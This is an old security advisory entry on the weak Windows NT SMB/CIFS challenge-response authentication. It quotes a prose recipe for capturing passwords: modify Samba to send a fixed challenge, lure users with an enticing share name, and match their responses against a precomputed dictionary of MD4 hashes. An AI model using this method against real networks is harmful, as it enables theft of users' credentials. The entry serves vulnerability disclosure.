DATE:  
COMMAND                                            SOURCE: 
                                                   AUTHOR: 
  CIFS

SYSTEMS AFFECTED

  Win NT
  

PROBLEM


    Paul  Ashton  <ashtonp@GB.SWISSBANK.COM>  in  response  to an
    article entitled  "Windows NT  authentication weakness"  regarding
    SMB/CIFS problems with the weak challenge response system used  by
    windows nt (see CIFS #1 ont this page).

    Set  up  Samba  on  a  Unix  machine  together with libdes for DES
    encryption.  Write  a 20 line  program that takes  /usr/dict/words
    or other  similar word  list, computes  the MD4  hash of each word
    and then use that to  encrypt an eight byte fixed  challenge (i.e.
    all zeroes).

    Make a one line change to the challenge generation code to  always
    generate this fixed value.

    Start  Samba  and  give  it  a  suitably interesting name, such as
    "Public picture archive".

    Wait for someone  to attempt to  connect to your  server, send the
    fixed  challenge,  receive  the  fixed  challenge encrypted by the
    users hashed  password. Instantaneously  look up  the hash  in the
    precomputed database.

    If it is not a dictionary  word, stuff it into a history  file and
    run a modified crack on it later.



EXPLOIT

  

SOLUTION


    A good job that NT's C2 configuration tool disables the network...
    Anyway,  if  you  are  thinking  about  fixing  this,  think about
    'mission impossible' (not a movie).